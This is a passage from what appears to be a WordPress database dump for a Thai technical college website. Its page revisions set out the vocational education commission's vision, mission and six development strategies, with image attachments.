การวิจัยเพื่อตอบสนองความต้องการของสถานประกอบการ</h4>\r\n<h4>2. ส่งเสริมการนำองค์ความรู้ เทคโนโลยี และนวัตกรรม ไปใช้พัฒนาคุณภาพการบริหารจัดการและการเรียนการสอน</h4>\r\n<h4>3. ส่งเสริมให้นำความรู้ เทคโนโลยี สิ่งประดิษฐ์ และนวัตกรรม ไปใช้พัฒนาอาชีพ จดสิทธิบัตร และพัฒนาสู่เชิงพาณิชย์</h4>\r\n<h4>4. พัฒนาระบบบริหารจัดการ เครือข่ายงานวิจัย และการจัดการความรู้อาชีวศึกษา ทั้งในประเทศและระดับนานาชาติ</h4>\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n</div>\r\n</div>\r\n</div>', 'วิสัยทัศน์', '', 'publish', 'closed', 'closed', '', '%e0%b8%a7%e0%b8%b4%e0%b8%aa%e0%b8%b1%e0%b8%a2%e0%b8%97%e0%b8%b1%e0%b8%a8%e0%b8%99%e0%b9%8c', '', '', '2018-06-19 13:43:25', '2018-06-19 06:43:25', '', 0, 'http://www.technicrayong.ac.th/?page_id=1091', 0, 'page', '', 0),
(1092, 3, '2018-02-15 16:20:31', '2018-02-15 09:20:31', '', '15-2-2561 16-21-21', '', 'inherit', 'closed', 'closed', '', '15-2-2561-16-21-21', '', '', '2018-02-15 16:20:31', '2018-02-15 09:20:31', '', 1091, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/15-2-2561-16-21-21.jpg', 0, 'attachment', 'image/jpeg', 0),
(1093, 3, '2018-02-15 16:21:31', '2018-02-15 09:21:31', '<img class=\"aligncenter wp-image-1092 size-full\" src=\"/wp-content/uploads/2018/02/15-2-2561-16-21-21.jpg\" alt=\"\" width=\"835\" height=\"623\" />', 'วิสัยทัศน์', '', 'inherit', 'closed', 'closed', '', '1091-revision-v1', '', '', '2018-02-15 16:21:31', '2018-02-15 09:21:31', '', 1091, 'http://www.technicrayong.ac.th/1091-revision-v1/', 0, 'revision', '', 0),
(1094, 3, '2018-06-19 13:43:37', '2018-06-19 06:43:37', '<img class=\"aligncenter wp-image-1092 size-full\" src=\"/wp-content/uploads/2018/02/15-2-2561-16-21-21.jpg\" alt=\"\" width=\"835\" height=\"623\" />\r\n\r\n \r\n<h3><strong>สำนักงานคณะกรรมการการอาชีวศึกษา</strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษาได้ดำเนินการในการผลิตและพัฒนากำลังคน เพื่อสนองตอบความต้องการกำลังคนในการพัฒนาประเทศ โดยในปี 2551 ได้สร้างภาพลักษณ์ที่ดีให้กับการอาชีวศึกษา เพื่อสร้างความนิยมในการเรียนวิชาชีพให้กับสังคม มีเป้าหมายเพื่อเพิ่มปริมาณผู้เรียน ในขณะเดียวกันได้ใช้กิจกรรมการบริการสังคมในโครงการและวาระพิเศษต่างๆเพื่อให้สังคมได้รับรู้ถึงศักยภาพของผู้เรียนอาชีวศึกษา และเป็นการสร้างประสบการณ์ให้กับผู้เรียนทั้งในด้านการฝึกงานวิชาชีพและปลูกฝังสำนึกการบริการสังคม นอกจากนี้ได้เน้นเครือข่ายความร่วมมือกับทุกภาคส่วนให้เข้ามาร่วมรับผิดชอบและมีบทบาทในการจัดการอาชีวศึกษาร่วมกันมากขึ้น ผลการดำเนินการดังกล่าวในปี 2551 ช่วยทำให้การอาชีวศึกษาเป็นที่รู้จักกับสังคมมากขึ้น และกลุ่มเป้าหมายต่างต้องการเข้าสู่ระบบอาชีวศึกษา ดังนั้นในปี2552 นี้ สำนักงานคณะกรรมการการอาชีวศึกษา จึงต้องการที่จะพัฒนาด้านคุณภาพให้เพิ่มขึ้นควบคู่ไปกับปริมาณผู้เรียน และขยายบทบาทการจัดการอาชีวศึกษาสำหรับผู้เรียนที่เป็นผู้มีงานทำแล้ว ผู้ที่ต้องการพัฒนาศักยภาพ และผู้ที่กำลังหางานทำให้มากขึ้น และให้ความสำคัญกับการค้นหา พัฒนา เผยแพร่ นวัตกรรม เทคโนโลยีเพื่อสร้าง และพัฒนาอาชีพให้เกิดประโยชน์ในเชิงพาณิชย์ จึงได้กำหนดแผนปฏิบัติราชการในปีงบประมาณ 2552 ไว้ดังนี้</h4>\r\n<h3></h3>\r\n<h3><strong>วิสัยทัศน์</strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษา เป็นองค์กรหลักที่มุ่งมั่นผลิตและพัฒนากำลังคนอาชีวศึกษาให้มีคุณภาพและมาตรฐาน สอดคล้องกับการพัฒนาเศรษฐกิจและสังคม ส่งผลต่อการเพิ่มขีดความสามารถในการแข่งขันของประเทศ</h4>\r\n<h3></h3>\r\n<h3><strong>พันธกิจ </strong></h3>\r\n<h4>• จัดการอาชีวศึกษาและฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</h4>\r\n<h4>• ขยายโอกาสทางการศึกษาวิชาชีพ อย่างทั่วถึงและเสมอภาค</h4>\r\n<h4>• วิจัย สร้างนวัตกรรม พัฒนาองค์ความรู้ เพื่อการพัฒนาอาชีพ</h4>\r\n<h4>ในการผลักดันให้วิสัยทัศน์และพันธกิจบรรลุตามเป้าหมายนั้น สำนักงานคณะกรรมการการอาชีวศึกษาได้กำหนดยุทธศาสตร์ไว้ 6 ยุทธศาสตร์ 35 กลยุทธ์ ดังนี้</h4>\r\n \r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 1 : การพัฒนาการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</span></strong></h3>\r\n<h4>สำนักงานคณะกรรมการการอาชีวศึกษามีภารกิจเกี่ยวกับการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพโดยคำนึงถึงคุณธรรมและความเป็นเลิศทางวิชาชีพ การพัฒนาการจัดการอาชีวศึกษาและฝึกอบรมวิชาชีพ จะเน้นการผลิตกำลังคนให้มีคุณภาพมาตรฐาน มีเส้นทางอาชีพที่ชัดเจน เพื่อสนับสนุนขีดความสามารถในการแข่งขันของประเทศ ตลอดจนให้มีการรับรองสมรรถนะของบุคคลในการประกอบอาชีพ เสริมสร้างทักษะการเป็นผู้ประกอบการ และสร้างค่านิยมที่ดีต่อการอาชีวศึกษา โดยมีเป้าประสงค์ให้ผู้สำเร็จอาชีวศึกษาและการฝึกอบรมวิชาชีพมีคุณภาพ มาตรฐาน มีงานทำและดำรงชีวิตอย่างมีความสุขในสังคม โดยมีกลยุทธ์หลักคือ</h4>\r\n<h4>1. พัฒนาครูและบุคลากรอาชีวศึกษา</h4>\r\n<h4>2. เร่งรัดพัฒนาคุณภาพและสมรรถนะผู้เรียน</h4>\r\n<h4>3. สร้างมาตรฐานและพัฒนาหลักสูตร กระบวนการเรียนการสอน และการวัดและประเมินผล</h4>\r\n<h4>4. ส่งเสริมการประกันคุณภาพสถานศึกษา</h4>\r\n<h4>5. ส่งเสริมคุณธรรม จริยธรรม และจรรยาบรรณวิชาชีพ</h4>\r\n<h4>6. พัฒนาสถานศึกษาและสถาบันการอาชีวศึกษาให้ได้มาตรฐาน มีความเป็นเลิศทางวิชาชีพ</h4>\r\n<h4>7. สร้างเสริมประสบการณ์วิชาชีพ ปลูกจิตอาสา ด้วยการบริการสังคม</h4>\r\n<h4>8. ส่งเสริมให้นำเทคโนโลยีสารสนเทศ สื่อ นวัตกรรม มาใช้ในการเรียนการสอน เสริมสร้างทักษะการเป็นผู้ประกอบการ</h4>\r\n<h4>9. สร้างภาพลักษณ์ที่ดีต่อการอาชีวศึกษา</h4>\r\n \r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 2 : สร้างเครือข่ายและส่งเสริมความร่วมมือ</span></strong></h3>\r\n<h4>การผลิตและพัฒนากำลังคนให้ตรงตามความต้องการของประเทศ ต้องได้รับร่วมมือกับองค์กรที่ต้องการใช้กำลังคน ตั้งแต่ภาคการผลิต เอกชน รัฐวิสาหกิจ และชุมชน เพื่อสร้างเครือข่ายความร่วมมือในการจัดการอาชีวศึกษาทั้งในและต่างประเทศ นำไปสู่การกำหนดหลักสูตร กระบวนการจัดการเรียนการสอนในการผลิตกกำลังคนได้ตรงกับความต้องการภาคการผลิตและความต้องการของผู้ใช้ โดยมีเป้าประสงค์ เพื่อผลิตและพัฒนากำลังคนสอดคล้องกับความต้องการของตลาดแรงงานและท้องถิ่น และมีกลยุทธ์ คือ</h4>\r\n<h4>1. ส่งเสริมและสนับสนุนความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพทั้งในและต่างประเทศ</h4>\r\n<h4>2. สร้างความเข้มแข็งในการสร้างเครือข่ายและความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ</h4>\r\n<h4>3. พัฒนาฐานข้อมูลความร่วมมือ</h4>\r\n<h4>4. พัฒนาศูนย์กำลังคนอาชีวศึกษา</h4>\r\n<h4>5. ประสาน ส่งเสริมและสนับสนุน การจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพของสถานศึกษาเอกชน สถานประกอบการและเครือข่าย</h4>\r\n<h3></h3>\r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 3: พัฒนาระบบบริหารจัดการอาชีวศึกษา</span></strong></h3>\r\n<h4>คุณภาพของการอาชีวศึกษา มีระบบการบริหารจัดการอาชีวศึกษาองค์ประกอบที่สำคัญที่สุดที่จะส่งผลต่อคุณภาพ การปฏิรูประบบราชการ พระราชกฤษฎีกาว่าด้วยหลักเกณฑ์และวิธีการบริหารกิจการบ้านเมืองที่ดี พ.ศ. 2546 และนำแนวทางการพัฒนาคุณภาพการบริหารจัดการภาครัฐ (Public Sector Management Quality Award : PMQA) ซี่งเป็นเครื่องมือในการพัฒนาองค์กรไปสู่ความเป็นเลิศ ในขณะที่กฎหมายการอาชีวศึกษาได้ระบุถึงการจัดตั้งสถาบันการอาชีวศึกษา ซึ่งต้องมีการพัฒนาระบบการบริหารและจัดการในรูปแบบสถาบันการอาชีวศึกษาควบคู่ไปด้วย อีกทั้งจากการประกาศใช้กฎหมายการอาชีวศึกษาดังกล่าว มีผลให้ต้องสร้างกฎหมาย กฎระเบียบ ต่างๆเพื่อนำไปสู่การปฏิบัติ</h4>\r\n<h4>ดังนั้นเพื่อให้การพัฒนาระบบบริหารและจัดการอาชีวศึกษาเป็นไปอย่างมีประสิทธิภาพ จึงได้กำหนดกลยุทธ์ไว้ดังนี้</h4>\r\n<h4>1. จัดและพัฒนาโครงสร้างการบริหารงานให้เป็นไปตาม ก.ม.การอาชีวศึกษาและก.ม.อื่นที่เกี่ยวข้อง</h4>\r\n<h4>2. พัฒนาระบบบริหารจัดการตามหลักเกณฑ์คุณภาพการบริหารจัดการภาครัฐและธรรมาภิบาล</h4>\r\n<h4>3. พัฒนากฎหมาย กฎ ระเบียบ ข้อบังคับ</h4>\r\n<h4>4. กระจายอำนาจการบริหารจัดการสู่สถานศึกษาและสถาบัน</h4>\r\n<h4>5. ผลักดันการจัดตั้งสถาบันการอาชีวศึกษา</h4>\r\n<h4>6. พัฒนาระบบติดตามและประเมินผลให้มีประสิทธิภาพ</h4>\r\n<h4>7. พัฒนาระบบการตรวจสอบภายในให้มีประสิทธิภาพ</h4>\r\n<h4>8. ส่งเสริมการนำเทคโนโลยีสารสนเทศเพื่อการบริหารจัดการและการให้บริการ</h4>\r\n<h4>9. เสริมสร้างสวัสดิการและขวัญกำลังใจ</h4>\r\n<h3></h3>\r\n<div>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 4 : ขยายโอกาสทางการศึกษาวิชาชีพและส่งเสริมการเรียนรู้ตลอดชีวิต</span></strong></h3>\r\n<h4>มุ่งเน้นการเพิ่มโอกาสทางการศึกษาวิชาชีพให้ประชาชนทุกคนมีโอกาสเข้าถึงการศึกษาด้านวิชาชีพที่มีคุณภาพมาตรฐานอย่างต่อเนื่องตลอดชีวิต ทั้งการศึกษาในระบบ</h4>\r\n<h4>การศึกษานอกระบบ และการศึกษาตามอัธยาศัย โดยมีจุดมุ่งหมายให้คลอบคลุมประชาชนทุกเพศทุกวัย และกลุ่มเป้าหมายทั้งเด็ก เยาวชน วัยแรงงาน สตรี ผู้สูงอายุ โดยเฉพาะผู้ยากไร้ ด้อยโอกาสคนพิการ ผู้ห่างไกลทุรกันดารและชนกลุ่มน้อย มีกลยุทธ์ดังนี้</h4>\r\n<h4>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ ด้วยรูปแบบที่หลากหลายทั้งในระบบ นอกระบบ และทวิภาคี</h4>\r\n<h4>2. ส่งเสริมและพัฒนาอาชีพให้ประชาชนในการสร้างงานสร้างรายได้</h4>\r\n<h4>3. จัดการศึกษาวิชาชีพแก่ผู้ด้อยโอกาส คนพิการ ผู้สูงอายุ</h4>\r\n<h4>4. ส่งเสริมให้มีการสร้างรายได้ระหว่างเรียน</h4>\r\n<h4></h4>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 5 : จัดอาชีวศึกษาเพื่อสร้างเสริมความมั่นคงของรัฐ</span></strong></h3>\r\n<h4>ส่งเสริมการจัดการศึกษาในจังหวัดชายแดน ให้เป็นกลไกเสริมสร้างความสมานฉันท์ สันติวิธี วิถีประชาธิปไตย บนพื้นฐานความหลากหลายทางวัฒนธรรม และความเป็นอัตลักษณ์ของแต่ละพื้นที่ มีความร่วมมือระหว่างประเทศด้านการศึกษา แลกเปลี่ยนความรู้ พัฒนาวิชาการ/วิชาชีพ เตรียมความพร้อมรองรับการเปิดเสรีการค้าในอนาคต โดยหวังผลให้ประเทศไทยเป็นศูนย์กลางการศึกษาวิชาชีพในภูมิภาค โดยเฉพาะสาขาที่มีศักยภาพและความพร้อม ประกอบไปด้วยกลยุทธ์ ดังนี้</h4>\r\n<h4>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในเขตชายแดนภาคใต้</h4>\r\n<h4>2. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพในพื้นที่ชายแดน และเขตพัฒนาพิเศษเฉพาะกิจ</h4>\r\n<h4>3. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพตามโครงการพระราชดำริ</h4>\r\n<h4>4. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาร่วมกับประเทศเพื่อนบ้านเพื่อสร้างความเข้าใจอันดี</h4>\r\n<h4></h4>\r\n<h3><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ ที่ 6 สนับสนุนการวิจัยและพัฒนาถ่ายทอดองค์ความรู้และเทคโนโลยี </span></strong></h3>\r\n<h4>เพื่อให้การอาชีวศึกษาเป็นองค์กรแห่งการเรียนรู้ ตั้งแต่การพัฒนาระบบการบริหารจัดการให้เอื้อต่อการเรียนรู้ การสร้างองค์ความรู้ และนวัตกรรมทางวิชาชีพ การเชื่อมโยงการวิจัยกับกระบวนการจัดการเรียนการสอนวิชาชีพ มีกลไกนำผลการวิจัยไปใช้ประโยชน์ได้จริง มีกลยุทธ์ ดังนี้</h4>\r\n<h4>1. ส่งเสริมพัฒนาการวิจัย สร้างนวัตกรรม สิ่งประดิษฐ์ และการวิจัยเชิงนโยบาย การวิจัยเพื่อตอบสนองความต้องการของสถานประกอบการ</h4>\r\n<h4>2. ส่งเสริมการนำองค์ความรู้ เทคโนโลยี และนวัตกรรม ไปใช้พัฒนาคุณภาพการบริหารจัดการและการเรียนการสอน</h4>\r\n<h4>3. ส่งเสริมให้นำความรู้ เทคโนโลยี สิ่งประดิษฐ์ และนวัตกรรม ไปใช้พัฒนาอาชีพ จดสิทธิบัตร และพัฒนาสู่เชิงพาณิชย์</h4>\r\n<h4>4. พัฒนาระบบบริหารจัดการ เครือข่ายงานวิจัย และการจัดการความรู้อาชีวศึกษา ทั้งในประเทศและระดับนานาชาติ</h4>\r\n<a href=\"/พันธกิจ\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/ปรัชญา\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a>\r\n\r\n<a href=\"/เอกลักษณ์\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/อัตลักษณ์\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n\r\n</div>\r\n</div>\r\n</div>', 'วิสัยทัศน์', '', 'inherit', 'closed', 'closed', '', '1091-autosave-v1', '', '', '2018-06-19 13:43:37', '2018-06-19 06:43:37', '', 1091, 'http://www.technicrayong.ac.th/1091-autosave-v1/', 0, 'revision', '', 0),
(1095, 3, '2018-02-15 16:24:26', '2018-02-15 09:24:26', '<img class=\"aligncenter wp-image-1092 size-full\" src=\"/wp-content/uploads/2018/02/15-2-2561-16-21-21.jpg\" alt=\"\" width=\"835\" height=\"623\" />\r\n\r\n \r\n<div><strong>สำนักงานคณะกรรมการการอาชีวศึกษา</strong></div>\r\n<div></div>\r\n<div>สำนักงานคณะกรรมการการอาชีวศึกษาได้ดำเนินการในการผลิตและพัฒนากำลังคน เพื่อสนองตอบความต้องการกำลังคนในการพัฒนาประเทศ โดยในปี 2551 ได้สร้างภาพลักษณ์ที่ดีให้กับการอาชีวศึกษา เพื่อสร้างความนิยมในการเรียนวิชาชีพให้กับสังคม มีเป้าหมายเพื่อเพิ่มปริมาณผู้เรียน ในขณะเดียวกันได้ใช้กิจกรรมการบริการสังคมในโครงการและวาระพิเศษต่างๆเพื่อให้สังคมได้รับรู้ถึงศักยภาพของผู้เรียนอาชีวศึกษา และเป็นการสร้างประสบการณ์ให้กับผู้เรียนทั้งในด้านการฝึกงานวิชาชีพและปลูกฝังสำนึกการบริการสังคม นอกจากนี้ได้เน้นเครือข่ายความร่วมมือกับทุกภาคส่วนให้เข้ามาร่วมรับผิดชอบและมีบทบาทในการจัดการอาชีวศึกษาร่วมกันมากขึ้น ผลการดำเนินการดังกล่าวในปี 2551 ช่วยทำให้การอาชีวศึกษาเป็นที่รู้จักกับสังคมมากขึ้น และกลุ่มเป้าหมายต่างต้องการเข้าสู่ระบบอาชีวศึกษา ดังนั้นในปี2552 นี้ สำนักงานคณะกรรมการการอาชีวศึกษา จึงต้องการที่จะพัฒนาด้านคุณภาพให้เพิ่มขึ้นควบคู่ไปกับปริมาณผู้เรียน และขยายบทบาทการจัดการอาชีวศึกษาสำหรับผู้เรียนที่เป็นผู้มีงานทำแล้ว ผู้ที่ต้องการพัฒนาศักยภาพ และผู้ที่กำลังหางานทำให้มากขึ้น และให้ความสำคัญกับการค้นหา พัฒนา เผยแพร่ นวัตกรรม เทคโนโลยีเพื่อสร้าง และพัฒนาอาชีพให้เกิดประโยชน์ในเชิงพาณิชย์ จึงได้กำหนดแผนปฏิบัติราชการในปีงบประมาณ 2552 ไว้ดังนี้</div>\r\n<div></div>\r\n<div><strong>วิสัยทัศน์</strong></div>\r\n<div>สำนักงานคณะกรรมการการอาชีวศึกษา เป็นองค์กรหลักที่มุ่งมั่นผลิตและพัฒนากำลังคนอาชีวศึกษาให้มีคุณภาพและมาตรฐาน สอดคล้องกับการพัฒนาเศรษฐกิจและสังคม ส่งผลต่อการเพิ่มขีดความสามารถในการแข่งขันของประเทศ</div>\r\n<div></div>\r\n<div><strong>พันธกิจ </strong></div>\r\n<div>• จัดการอาชีวศึกษาและฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</div>\r\n<div>• ขยายโอกาสทางการศึกษาวิชาชีพ อย่างทั่วถึงและเสมอภาค</div>\r\n<div>• วิจัย สร้างนวัตกรรม พัฒนาองค์ความรู้ เพื่อการพัฒนาอาชีพ</div>\r\n<div>ในการผลักดันให้วิสัยทัศน์และพันธกิจบรรลุตามเป้าหมายนั้น สำนักงานคณะกรรมการการอาชีวศึกษาได้กำหนดยุทธศาสตร์ไว้ 6 ยุทธศาสตร์ 35 กลยุทธ์ ดังนี้</div>\r\n<div></div>\r\n<div><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 1 : การพัฒนาการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพให้มีคุณภาพมาตรฐาน</span></strong></div>\r\n<div></div>\r\n<div>สำนักงานคณะกรรมการการอาชีวศึกษามีภารกิจเกี่ยวกับการจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพโดยคำนึงถึงคุณธรรมและความเป็นเลิศทางวิชาชีพ การพัฒนาการจัดการอาชีวศึกษาและฝึกอบรมวิชาชีพ จะเน้นการผลิตกำลังคนให้มีคุณภาพมาตรฐาน มีเส้นทางอาชีพที่ชัดเจน เพื่อสนับสนุนขีดความสามารถในการแข่งขันของประเทศ ตลอดจนให้มีการรับรองสมรรถนะของบุคคลในการประกอบอาชีพ เสริมสร้างทักษะการเป็นผู้ประกอบการ และสร้างค่านิยมที่ดีต่อการอาชีวศึกษา โดยมีเป้าประสงค์ให้ผู้สำเร็จอาชีวศึกษาและการฝึกอบรมวิชาชีพมีคุณภาพ มาตรฐาน มีงานทำและดำรงชีวิตอย่างมีความสุขในสังคม โดยมีกลยุทธ์หลักคือ</div>\r\n<div>1. พัฒนาครูและบุคลากรอาชีวศึกษา</div>\r\n<div>2. เร่งรัดพัฒนาคุณภาพและสมรรถนะผู้เรียน</div>\r\n<div>3. สร้างมาตรฐานและพัฒนาหลักสูตร กระบวนการเรียนการสอน และการวัดและประเมินผล</div>\r\n<div>4. ส่งเสริมการประกันคุณภาพสถานศึกษา</div>\r\n<div>5. ส่งเสริมคุณธรรม จริยธรรม และจรรยาบรรณวิชาชีพ</div>\r\n<div>6. พัฒนาสถานศึกษาและสถาบันการอาชีวศึกษาให้ได้มาตรฐาน มีความเป็นเลิศทางวิชาชีพ</div>\r\n<div>7. สร้างเสริมประสบการณ์วิชาชีพ ปลูกจิตอาสา ด้วยการบริการสังคม</div>\r\n<div>8. ส่งเสริมให้นำเทคโนโลยีสารสนเทศ สื่อ นวัตกรรม มาใช้ในการเรียนการสอน เสริมสร้างทักษะการเป็นผู้ประกอบการ</div>\r\n<div>9. สร้างภาพลักษณ์ที่ดีต่อการอาชีวศึกษา</div>\r\n<div></div>\r\n<div>\r\n<div><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 2 : สร้างเครือข่ายและส่งเสริมความร่วมมือ</span></strong></div>\r\n<div></div>\r\n<div>การผลิตและพัฒนากำลังคนให้ตรงตามความต้องการของประเทศ ต้องได้รับร่วมมือกับองค์กรที่ต้องการใช้กำลังคน ตั้งแต่ภาคการผลิต เอกชน รัฐวิสาหกิจ และชุมชน เพื่อสร้างเครือข่ายความร่วมมือในการจัดการอาชีวศึกษาทั้งในและต่างประเทศ นำไปสู่การกำหนดหลักสูตร กระบวนการจัดการเรียนการสอนในการผลิตกกำลังคนได้ตรงกับความต้องการภาคการผลิตและความต้องการของผู้ใช้ โดยมีเป้าประสงค์ เพื่อผลิตและพัฒนากำลังคนสอดคล้องกับความต้องการของตลาดแรงงานและท้องถิ่น และมีกลยุทธ์ คือ</div>\r\n<div>1. ส่งเสริมและสนับสนุนความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพทั้งในและต่างประเทศ</div>\r\n<div>2. สร้างความเข้มแข็งในการสร้างเครือข่ายและความร่วมมือในการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ</div>\r\n<div>3. พัฒนาฐานข้อมูลความร่วมมือ</div>\r\n<div>4. พัฒนาศูนย์กำลังคนอาชีวศึกษา</div>\r\n<div>5. ประสาน ส่งเสริมและสนับสนุน การจัดการอาชีวศึกษาและการฝึกอบรมวิชาชีพของสถานศึกษาเอกชน สถานประกอบการและเครือข่าย</div>\r\n<div></div>\r\n<div>\r\n<div><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 3: พัฒนาระบบบริหารจัดการอาชีวศึกษา</span></strong></div>\r\n<div></div>\r\n<div>คุณภาพของการอาชีวศึกษา มีระบบการบริหารจัดการอาชีวศึกษาองค์ประกอบที่สำคัญที่สุดที่จะส่งผลต่อคุณภาพ การปฏิรูประบบราชการ พระราชกฤษฎีกาว่าด้วยหลักเกณฑ์และวิธีการบริหารกิจการบ้านเมืองที่ดี พ.ศ. 2546 และนำแนวทางการพัฒนาคุณภาพการบริหารจัดการภาครัฐ (Public Sector Management Quality Award : PMQA) ซี่งเป็นเครื่องมือในการพัฒนาองค์กรไปสู่ความเป็นเลิศ ในขณะที่กฎหมายการอาชีวศึกษาได้ระบุถึงการจัดตั้งสถาบันการอาชีวศึกษา ซึ่งต้องมีการพัฒนาระบบการบริหารและจัดการในรูปแบบสถาบันการอาชีวศึกษาควบคู่ไปด้วย อีกทั้งจากการประกาศใช้กฎหมายการอาชีวศึกษาดังกล่าว มีผลให้ต้องสร้างกฎหมาย กฎระเบียบ ต่างๆเพื่อนำไปสู่การปฏิบัติ</div>\r\n<div>ดังนั้นเพื่อให้การพัฒนาระบบบริหารและจัดการอาชีวศึกษาเป็นไปอย่างมีประสิทธิภาพ จึงได้กำหนดกลยุทธ์ไว้ดังนี้</div>\r\n<div>1. จัดและพัฒนาโครงสร้างการบริหารงานให้เป็นไปตาม ก.ม.การอาชีวศึกษาและก.ม.อื่นที่เกี่ยวข้อง</div>\r\n<div>2. พัฒนาระบบบริหารจัดการตามหลักเกณฑ์คุณภาพการบริหารจัดการภาครัฐและธรรมาภิบาล</div>\r\n<div>3. พัฒนากฎหมาย กฎ ระเบียบ ข้อบังคับ</div>\r\n<div>4. กระจายอำนาจการบริหารจัดการสู่สถานศึกษาและสถาบัน</div>\r\n<div>5. ผลักดันการจัดตั้งสถาบันการอาชีวศึกษา</div>\r\n<div>6. พัฒนาระบบติดตามและประเมินผลให้มีประสิทธิภาพ</div>\r\n<div>7. พัฒนาระบบการตรวจสอบภายในให้มีประสิทธิภาพ</div>\r\n<div>8. ส่งเสริมการนำเทคโนโลยีสารสนเทศเพื่อการบริหารจัดการและการให้บริการ</div>\r\n<div>9. เสริมสร้างสวัสดิการและขวัญกำลังใจ</div>\r\n<div></div>\r\n<div>\r\n<div><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 4 : ขยายโอกาสทางการศึกษาวิชาชีพและส่งเสริมการเรียนรู้ตลอดชีวิต</span></strong></div>\r\n<div></div>\r\n<div>มุ่งเน้นการเพิ่มโอกาสทางการศึกษาวิชาชีพให้ประชาชนทุกคนมีโอกาสเข้าถึงการศึกษาด้านวิชาชีพที่มีคุณภาพมาตรฐานอย่างต่อเนื่องตลอดชีวิต ทั้งการศึกษาในระบบ</div>\r\n<div>การศึกษานอกระบบ และการศึกษาตามอัธยาศัย โดยมีจุดมุ่งหมายให้คลอบคลุมประชาชนทุกเพศทุกวัย และกลุ่มเป้าหมายทั้งเด็ก เยาวชน วัยแรงงาน สตรี ผู้สูงอายุ โดยเฉพาะผู้ยากไร้ ด้อยโอกาสคนพิการ ผู้ห่างไกลทุรกันดารและชนกลุ่มน้อย มีกลยุทธ์ดังนี้</div>\r\n<div></div>\r\n<div>1. ส่งเสริมและพัฒนาการจัดอาชีวศึกษาและการฝึกอบรมวิชาชีพ ด้วยรูปแบบที่หลากหลายทั้งในระบบ นอกระบบ และทวิภาคี</div>\r\n<div>2. ส่งเสริมและพัฒนาอาชีพให้ประชาชนในการสร้างงานสร้างรายได้</div>\r\n<div>3. จัดการศึกษาวิชาชีพแก่ผู้ด้อยโอกาส คนพิการ ผู้สูงอายุ</div>\r\n<div>4. ส่งเสริมให้มีการสร้างรายได้ระหว่างเรียน</div>\r\n<div></div>\r\n<div><strong><span class=\"Apple-style-span\">ยุทธศาสตร์ที่ 5 : จัดอาชีวศึกษาเพื่อสร้างเสริมความมั่นคงของรัฐ</span></strong></div>\r\n<div></div>\r\n<div>ส่งเสริมการจัดการศึกษาในจังหวัดชายแดน ให้เป็นกลไกเสริมสร้างความสมานฉันท์ สันติวิธี วิถีประชาธิปไตย บนพื้นฐานความหลากหลายทางวัฒนธรรม และความเป็นอัตลักษณ์ของแต่ละพื้นที่ มีความร่วมมือระหว่างประเทศด้านการศึกษา แลกเปลี่ยนความรู้ พัฒนาวิชาการ/วิชาชีพ เตรียมความพร้อมรองรับการเปิดเสรีการค้าในอนาคต โดยหวังผลให้ประเทศไทยเป็นศูนย์กลางการศึกษาวิชาชีพในภูมิภาค 